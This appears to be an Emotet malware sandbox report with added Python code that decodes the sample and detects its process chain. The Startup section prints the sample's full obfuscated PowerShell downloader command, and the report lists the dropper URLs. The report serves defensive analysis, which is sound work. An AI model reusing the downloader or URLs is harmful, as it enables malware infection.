Analysis Report 79a2gzs3gkk.doc

Overview

General Information

Sample Name: 79a2gzs3gkk.doc
Analysis ID: 343551
MD5: 09a4d7bbb0db4003f6d6eee258f0ae48
SHA1: b611b372dc40c114d2fb52cf967ffb9062728372
SHA256: df5ff0dd34808825942b6b896c5129f63bc36f8fbbba7f3ce145cced467c662a

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2268 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1552 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AK
AAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJ
wBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2556 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
      • rundll32.exe (PID: 620 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • rundll32.exe (PID: 2288 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 1928 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
    • powershell.exe (PID: 2452 cmdline: powershell -w hidden -enc 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2724 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2696 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2432 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2512 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2872 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzU MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 3064 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 3016 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 268 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFY MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2504 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2556 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRae MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
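
The cmd.exe command line in the tree above is the whole initial-access chain in one string: cmd's caret escapes hide the `msg` and `powershell` tokens from naive string matching, and the `-enc` argument is base64 over a UTF-16LE script that builds the dropper URL list from concatenated string fragments, with the scheme swapped for a marker (`x [ sh b` stands in for `http` in this sample) and the entries joined by `!`. The Python below is an added example, not part of the Joe Sandbox report and not the malware's own code: it strips the carets, extracts and decodes the encoded argument, folds the `'a'+'b'` and `('a')` literal concatenations, reverses the marker and lists the URLs. Because the real argument runs to thousands of characters, the embedded command line is a constructed stand-in that reuses the URL list recovered from powershell memory in this report and the same obfuscation shape; every function name is the example's own, and the marker is supplied by the analyst after reading the decoded script (the sample's real script wraps its `Replace` and `Split` arguments in further indirection that this simple folding does not emulate).

```python
import base64
import re

# Constructed stand-in for the report's cmd.exe command line. The shape is the
# sample's (caret-mangled tokens, msg.exe decoy, "powershell -w hidden -enc"),
# the URL list is the one seen in powershell memory, and "x [ sh b" is the
# sample's stand-in for "http". The variable name is arbitrary.
SAMPLE_SCRIPT = (
    "$Xap1lma=('x'+' '+('['+' sh b:'+'//')+('co'+'wor')+('k'+'ingpl')+'us'+'.'"
    "+('es'+'/w')+('p-a'+'dmin'+'/Fxm')+('ME'+'/')+'!'+('x [ sh b'+'s://bbjug')"
    "+('ueteria.com'+'/s6kscx/Z/')+'!x [ sh b://alugrama.com.mx/t/2/')"
    ".Replace('x [ sh b','http').Split('!');"
)


def build_sample_cmdline(script=SAMPLE_SCRIPT):
    """Encode a script the way the maldoc does: UTF-16LE, then base64, behind carets."""
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return ("cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror. & "
            "p^owe^rs^he^ll^ -w hi^dd^en -^e^nc " + enc)


def strip_carets(cmdline):
    """cmd.exe consumes '^' as its escape character, so deleting it restores the text."""
    return cmdline.replace("^", "")


# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest alternative first.
ENC_ARG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)", re.I)


def extract_encoded_arg(cmdline):
    m = ENC_ARG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE; tolerate missing padding and a dangling byte."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")


LIT_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'a'+'b'  -> 'ab'
PAREN_LIT = re.compile(r"\(\s*'([^']*)'\s*\)")            # ('a')    -> 'a'


def collapse_literals(script):
    """Fold literal concatenations until a fixed point; variables are left alone."""
    prev = None
    while prev != script:
        prev = script
        script = LIT_CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        script = PAREN_LIT.sub(lambda m: "'" + m.group(1) + "'", script)
    return script


URL = re.compile(r"https?://[^\s'\"!]+")   # '!' is the list separator in this sample


def recover_urls(script, marker, replacement="http"):
    """Undo the scheme-marker substitution and pull URLs out of the string literals."""
    collapsed = collapse_literals(script).replace(marker, replacement)
    found = []
    for lit in re.findall(r"'([^']*)'", collapsed):
        for url in URL.findall(lit):
            if url not in found:
                found.append(url)
    return found


def analyze_cmdline(cmdline, marker):
    """Full pipeline: carets -> -enc argument -> UTF-16LE script -> dropper URLs."""
    b64 = extract_encoded_arg(strip_carets(cmdline))
    if b64 is None:
        return []
    return recover_urls(decode_encoded_command(b64), marker)


if __name__ == "__main__":
    for url in analyze_cmdline(build_sample_cmdline(), "x [ sh b"):
        print(url)
```

Feeding the first 32 characters of the report's own argument, `IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwA`, to `decode_encoded_command` yields ` SeT-vARiaBL`, the start of the `Set-Variable` call that opens the script, which is the quickest way to confirm the argument is UTF-16LE base64 and not a second layer of packing.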

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000009.00000002.2125452150.0000000000690000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000F.00000002.2188345600.0000000010000000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000011.00000002.2207082899.0000000000260000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000B.00000002.2149603848.0000000010000000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000F.00000002.2187673787.0000000000150000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(first 5 of 37 entries shown)

Unpacked PEs

Source | Rule | Description | Author
9.2.rundll32.exe.250000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
12.2.rundll32.exe.10000000.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
8.2.rundll32.exe.10000000.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
11.2.rundll32.exe.190000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
16.2.rundll32.exe.210000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(first 5 of 79 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2696, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1, ProcessId: 824
Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis | Data: Command: powershell -w hidden -enc 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
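
The two Sigma matches, read together with the process tree in the Startup section, are the detection surface of this sample: an Office process spawning cmd and PowerShell, an encoded PowerShell command line, rundll32 invoked with an ordinal export (`,#1`), rundll32 loading modules with non-DLL extensions from random directories under SysWOW64, and rundll32 re-launching itself with a different module. The Python below is an added example, neither Joe Sandbox's signatures nor the published Sigma rules: it encodes those conditions as simple checks and runs them over process-creation events copied from this report's startup tree. The event list is a constructed fixture (the `-enc` argument is cut to the first 36 characters of the report's value), and the rule and function names are the example's own. Parents are resolved by PID for brevity; real pipelines must key on process GUIDs, because this very tree shows PID 2556 reused by msg.exe and later by rundll32.exe.

```python
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid cmdline")

# Process-creation events copied from the report's startup tree (PID, parent
# PID, command line). Constructed fixture: real telemetry would be Sysmon
# event 1 or Security event 4688. The -enc argument is truncated to the first
# 36 characters of the report's value, which is enough for the check below.
EVENTS = [
    Event(2268, 0, r"'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding"),
    Event(1552, 2268, r"cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. "
                      r"& p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAg"),
    Event(2556, 1552, r"msg user /v Word experienced an error trying to open the file."),
    Event(2452, 1552, r"powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAg"),
    Event(2724, 2452, r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString"),
    Event(2696, 2724, r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString"),
    Event(824, 2696, r"C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1"),
    Event(2432, 824, r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZ"),
    Event(2512, 2432, r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1"),
]

FIRST_TOKEN = re.compile(r"\s*(?:'([^']+)'|\"([^\"]+)\"|(\S+))")
RUNDLL_MODULE = re.compile(
    r"\s*(?:'[^']*rundll32\.exe'|\"[^\"]*rundll32\.exe\"|\S*rundll32\.exe)\s+"
    r"(?:'([^']+)'|\"([^\"]+)\"|([^\s,]+))", re.I)
ORDINAL = re.compile(r",\s*#\d+\b")                       # DllName,#123
ENCODED = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|en|e)\s+[A-Za-z0-9+/=]{20,}", re.I)
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}
SHELLS = POWERSHELL | {"cmd", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def image_name(cmdline):
    """Lower-cased basename of the first (possibly quoted) token of a command line."""
    m = FIRST_TOKEN.match(cmdline)
    if not m:
        return ""
    exe = next(g for g in m.groups() if g is not None)
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rundll32_module(cmdline):
    """Module path handed to rundll32 (quoted or bare), or None."""
    m = RUNDLL_MODULE.match(cmdline)
    return next(g for g in m.groups() if g is not None) if m else None


def is_rundll32(ev):
    return image_name(ev.cmdline) == "rundll32.exe"


def rule_call_by_ordinal(ev, parent):
    return is_rundll32(ev) and bool(ORDINAL.search(ev.cmdline))


def rule_nondll_module(ev, parent):
    # Emotet drops its payload as <random dir>\<random name>.<random ext> under SysWOW64.
    mod = rundll32_module(ev.cmdline) if is_rundll32(ev) else None
    return mod is not None and not mod.lower().endswith((".dll", ".cpl", ".ocx", ".ax"))


def rule_encoded_powershell(ev, parent):
    return image_name(ev.cmdline) in POWERSHELL and bool(ENCODED.search(ev.cmdline))


def rule_office_spawns_shell(ev, parent):
    return (parent is not None and image_name(parent.cmdline) in OFFICE
            and image_name(ev.cmdline) in SHELLS)


def rule_rundll32_relaunch(ev, parent):
    """rundll32 spawning rundll32 with a different module: the hop from user dir to SysWOW64."""
    if parent is None or not (is_rundll32(ev) and is_rundll32(parent)):
        return False
    child, par = rundll32_module(ev.cmdline), rundll32_module(parent.cmdline)
    return child is not None and par is not None and child.lower() != par.lower()


RULES = {
    "rundll32_call_by_ordinal": rule_call_by_ordinal,
    "rundll32_non_dll_module": rule_nondll_module,
    "encoded_powershell": rule_encoded_powershell,
    "office_spawns_shell": rule_office_spawns_shell,
    "rundll32_relaunch_other_module": rule_rundll32_relaunch,
}


def evaluate(events):
    """Return (pid, rule name) for every event that trips a rule."""
    # Keyed by PID only for this fixture; key on process GUIDs in production,
    # since PID 2556 is reused within this very report.
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        for name, rule in RULES.items():
            if rule(ev, parent):
                hits.append((ev.pid, name))
    return hits


if __name__ == "__main__":
    for pid, name in evaluate(EVENTS):
        print(pid, name)
```

On this fixture the ordinal and non-DLL-extension checks fire on the SysWOW64 stages, the relaunch check fires once at the hop from the user profile DLL to the first SysWOW64 module, and the Office-to-shell and encoded-PowerShell checks catch the two earliest processes, so any one of them on its own would have surfaced the chain before the first C2 POST on port 8080.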

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve | Avira URL Cloud: Label: malware
Source: https://bbjugueteria.com/s6kscx/Z/ | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.9 | Avira URL Cloud: Label: malware
Source: http://coworkingplus.es/wp-admin/FxmME/ | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-includes/fz/ | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.9.1 | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/wp-content/uploads/2020/11/winmark.png | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/brands/ | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/iletisim/ | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-includes/wlwmanifest.xml | Avira URL Cloud: Label: malware
Source: http://armakonarms.com | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/comments/feed/ | Avira URL Cloud: Label: malware
Source: http://silkonbusiness.matrixinfotechsolution.com | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/wp-content/uploads/2020/11/winmark-100x100.png | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.9. | Avira URL Cloud: Label: malware
Source: http://homecass.com/wp-content/iF/P | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/urun-kategori/pump-action-2/ | Avira URL Cloud: Label: malware
Source: http://homecass.com/wp-content/iF/ | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.9. | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-includes/js/wp-embed.min.js?ver=5.6 | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/urun-kategori/short-pump-action/ | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/feed/ | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/themes/neve/assets/css/woocommerce.min.css?ver=2.10.0 | Avira URL Cloud: Label: malware
